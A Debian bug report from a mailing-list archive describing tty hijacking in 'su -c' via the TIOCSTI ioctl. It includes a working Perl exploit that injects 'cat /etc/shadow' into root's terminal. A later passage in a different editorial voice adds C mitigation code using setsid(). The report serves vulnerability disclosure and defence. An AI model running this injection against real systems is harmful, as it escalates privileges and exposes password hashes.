[Pkg-shadow-devel] Bug#628843: login: tty hijacking possible in "su" via TIOCSTI ioctl

Daniel Ruoso daniel at ruoso.com
Wed Jun 1 19:24:47 UTC 2011


Package: login
Version: 1:4.1.4.2+svn3283-2+squeeze1
Severity: critical

After investigating why RedHat has a different behavior regarding "su -c", I
found out that there is a patch in RedHat to prevent tty hijacking when using
"su -c".

What makes the hijacking possible is that "su -c" still gives the command a
controlling tty, which means it has ioctl access to /dev/tty. This means it
can send things to the tty input buffer, which will be read just after su
ends.

The original report (with patch) on RedHat (from 2005?!?!?!) is:
https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=173008

A very simple exploit follows (Perl code):

#!/usr/bin/perl
# Pushes each character of a command line into the controlling tty's input
# queue via TIOCSTI; the terminal reads it as if typed once su returns.
require "sys/ioctl.ph";
open my $tty_fh, '<', '/dev/tty' or die $!;
foreach my $c (split //, 'cat /etc/shadow'.$/) {
    ioctl($tty_fh, &TIOCSTI, $c);
}

The scenario is:

Root runs a command as a less privileged user with "su -c"; if that user was
compromised, the script will be able to run commands as root by injecting
keystrokes on the terminal.
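The mitigation implied by the report is to run the child without a controlling tty. As an added illustration (not the shadow package's su code nor the RedHat patch), the C program below runs "sh -c CMD" in a fresh session via setsid(), so the child cannot open /dev/tty and has no fd on which TIOCSTI could target the caller's terminal; the helper name and the probe command are my own constructions.

```c
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run "sh -c cmd" in a new session and return its exit status
 * (-1 if fork/wait fails). Because the child calls setsid() before
 * exec, it has no controlling terminal: open("/dev/tty") fails with
 * ENXIO, so the keystroke injection from the report has no target.
 * Illustrative code only, not su's own implementation. */
int detached_sh_status(const char *cmd)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* A just-forked child is never a process-group leader, so
         * setsid() succeeds: new session, new group, no controlling tty. */
        if (setsid() < 0)
            _exit(127);
        char *argv[] = { "sh", "-c", (char *)cmd, NULL };
        execvp(argv[0], argv);
        _exit(127); /* only reached if exec fails */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed probe: exits 0 only if the child can open /dev/tty
     * and the opened descriptor really is a terminal. */
    const char *probe = "exec 2>/dev/null 3<>/dev/tty && [ -t 3 ]";
    int rc = detached_sh_status(probe);
    printf("detached child can reach the terminal: %s\n",
           rc == 0 ? "yes" : "no (expected)");
    return 0;
}
```

A detached child also cannot read from the invoking terminal, so this only suits non-interactive commands.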

-- System Information:
Debian Release: 6.0.1
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.32-5-686 (SMP w/1 CPU core)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages login depends on:
ii  libc6                         2.11.2-10  Embedded GNU C Library: Shared lib
ii  libpam-modules                1.1.1-6.1  Pluggable Authentication Modules f
ii  libpam-runtime                1.1.1-6.1  Runtime support for the PAM librar
ii  libpam0g                      1.1.1-6.1  Pluggable Authentication Modules l

login recommends no packages.

login suggests no packages.

-- no debconf information
